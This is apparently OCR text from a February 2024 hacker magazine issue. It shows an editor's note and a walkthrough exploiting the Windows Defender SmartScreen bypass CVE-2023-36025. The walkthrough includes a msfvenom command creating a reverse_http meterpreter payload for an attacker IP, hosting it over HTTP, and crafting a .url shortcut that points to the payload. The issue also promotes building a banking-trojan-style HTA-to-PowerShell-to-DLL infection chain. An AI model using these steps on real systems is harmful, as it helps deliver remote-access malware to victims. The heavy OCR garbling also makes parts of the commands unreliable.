Simplifying Cyber Security since 2016 MG Exploiting Windows Defender Smart Screen Security Bypass in INITIAL ACCESS INFECTION CHAIN From HTA file to payload via powershell script and DLL file, the Black Hat hacker style. BYPASSING AV / EDR How Black Hat hackers are using Github commit messages to hide their malicious activityCopyright © 2016 - 2024 Hackercool CyberSecurity (OPC) Pvt Ltd |All rights reserved. No part of this publication may be reproduced, distributed, or ee in any form or by any means, including photocopying, recording, or other| lectronic or mechanical methods, without the prior written permission of the lpublishe -r, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to the publisher, addressed “Attention: Permissions Coordinator,” at |the address below. [Any references to historical events, real people, or real places are used fictitiously. Na mes, characters, and places are products of the author's imagination. Hackercool Cybersecurity (OPC) Pvt Ltd. Banjara Hills, Hyderabad 50003. Telangana, India. Website : www.hackercoolmagazine.com] Email Address : (min @hackercoolmagazinInformation provided in this Magazine is strictly for educational purpose only. Please don't misuse this knowledge to hack into devices or networks without taking permission. The Magazine will not take any responsibility for misuse of this information.4 Then you will know the truth and the truth will set you free John 8:32 Editor's Note Edition 7 Issue 2 [Hello readers, This is Kalyan Chinta with the latest Issue of Hackercool Magazine. Let’s give ou a quick summary of what this Issue contains. The first article of this Issue is ow to exploit a vulnerability in Windows Defender SmartScreen (CVE-2023- |36025) that is already popular with Black Hat Hackers around the world. This ulnerability describes how to gain initial access by bypassing Windows [Defender Smart Screen. Next article brings you one of the infection chains of |Ursniff banking trojan. This infection chain starts with a zip archive containing a single HTA file. When victims click on this HTA file, it downloads and executes la BowerShell script which then downloads and executes a DLL file which finally \downloads the payload and executes it on the target system. Yes, I show you ow to create the infection chain. Instead of using Ursniff trojan as payload, we jwill be using msfvenom meterpreter. Next, in Tool of the Month feature, we bring ‘ou a complete guide on [Hydra Password cracker. Then, you will learn how a ack Hat Hacker group jused Github commit messages to hide its malicious activity. Then you will learn labout multiple vulnerabilities disclosed recently in Ivanti VPN appliances and |their impact. Kalyan Chinta, Founder, Hackercool Magazine "GENERATIVE Al CAN BE USED TO EVADE STRING-BASED YARA RULES BY AUGMENTING THE SOURCE CODE OF SMALL MALWARE VARIANTS, EFFECTIVELY LOWERING DETECTION RATES." -RECORDED FUTURE ON Al'S INCREASING ROLE IN DEEPFAKES AND MALWAREINSIDE See what our Hackercool Magazine's February 2024 Issue has in store for you. 1. Initial Access: Exploiting Windows Defender Smart Screen Security Bypass. 2. Infection Chain: Ursniff banking trojan. 3. Tool Of The Month: Hydra password cracker. 4. Cyber security: Cybersecurity for satellites is a growing challenge, as threats to space- based infrastructure grow. 5. Bypassing AV/EDR: How a Black Hat Hacker group is exploiting Github commit messages to hide their] malicious activity. 6. Vulnerability for beginners: Learn about multiple vulnerabilities in Ivanti VPN appliances. Other Useful Resources6 Exploiting Windows Defender Smart Screen security bypass INITIAL ACCESS Threat Actors exploited the Windows Defender Smart screen security bypass vulnerability to \deploy an open-source stealer called Phemodrone stealer on the target systems on January 2024. he same vulnerability was exploited by another hacker group behind Mispadu banking trojan in lthe first week of February 2024. Recently a hacker group named Water Hydra (aka Dark Casino) lexploited this vulnerability to deploy Darkme malware. But what exactly is this Windows [Defender Smart screen security bypass vulnerability? To know this, first you have to learn what is Windows Smart screen and what it does. Before, I explain about this vulnerability, let’s see it in action first. For this, I am using Kali Linux las attacker machine and Windows 10 20H2 as target system. Simply put, I create a meterpreter ayload using ms enom -p Pee CUT hee eae ee et ee ee 2.168.249.148 lport=80 o> MAAC eat ad) A ee ka p_148_80.exe msfvenom -p windows/x64/meterpreter/reverse_http lLhost=19 Peel Pe Lee Crema CLT ad) Ae [eS et >) [-] No platform was selected, choosing Msf::Modul Par hace :Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 695 bytes Final size of exe file: 7168 bytes Then, I host it on the attacker system using the python single http server. We have many times in our previous Issues. As you might have expected, I download it on the target system using a browser. Normally, I just lexecute it but not in this case. I right click on the file and click on the “Properties” tab.At the end lof the “Properties” window, you should see this. This message is from Mark of The Web (MoTW) labout which you studied in one of our previous Issues. en its so “When hackers have acceso powerful computer tha use brute foyce hain can crack almost any password; even one user with insecure access being succ hacked can result in a major breach.” -Toomas Hendrik Tlves7 1H met x64_http_148_80 Properties x General Compatibility Securty Details Previous Versions 5 aeeas Type of file: Application (exe) Description: met_x64_http_148_80 Location: C:\Users\admin\Downloads Sze’ 7.00 KB (7.168 bytes) Size on disk: 8,00 KB (8,192 bytes) Created Monday, March 4, 2024, 12:26:31 PM Modfied: Monday, March 4, 2024, 12:26:49 PM Accessed: Today, March 4, 2024, 12:26:49 PM CiReadonly []Hidden Advanced... This fle came from another computer and might be blocked to help protect this computer. Dunbiock Cancel Aeply Now, I will execute it by simply double clicking on the file. However, instead of giving us a meterpreter session as expected, we get a blue window. This is Windows Defender Smartscreen lin action. Read the message carefully. “It’s no surprise that hackers working for North Korea, Iran's mullahs, Vladimir V, Putin in Russia, and the People’s Liberation Army of China have all learned that the great advantage of cyberweapons is that they are ihe opposite of a nuke: hard to detect, easy to deny, and increasingly finely targeted.” -David E. SangerWindows protected your PC What Smart Screen did was that it blocked our app from running as it considered it as malicious. jot just mine, it will block any app that it considers as malicious. But how does it determine the file as malicious? What is Microsoft Windows Defender Smart Screen? Microsoft Defender Smart screen is a Windows feature that protects users against phishing lor malware websites, applications and downloading potentially malicious files. Smart screen also ldetermines if a downloaded app is malicious by checking the downloaded files against a list of files that are downloaded frequently. If the file is not on that list, it displays the message as the one khown above. What is CVE-2023-36025? Windows Smart screen security feature bypass vulnerability that is assigned with CVEID |CVE-2023.36025. This vulnerability allows attackers to bypass the Windows smart screen altogethe r and install files on the target system. Let us see how to exploit this to execute the meterpreter payload we used above. For this we will need an URL file.9 What is an URL file? An URL file is an Internet shortcut file: Let see how to create one. For this, I open a new text ldocument on Windows (Notepad) and add this code to the file, “| New Text Document - Notepad File Edit Format View Help [InternetShortcut] URL=http: //192. 168.249. 148:8000/met_x64_http_148_80.exe IDLIST-| Then, I save it with a different name but the same extension (;txt). I named it “hc_test.txt”. Note lthat I didn’t change any extension. It isstill a text file, _)) he_test - Notepad File Edit Format View Help [InternetShortcut] URL=http: //192.168.249.148:8000/met_x64_http_148_80.exe IDLIST-| INext, I open this ‘he_test.txt’ file and rename it to “hc_test.url’ as shown below. The file is still a text document only. File name: | he_test.url Save as type: | Text Documents (*.tet) Encoding: | UTF-8 v Cancel (Our URL file is ready as shown below. ” Hide Folders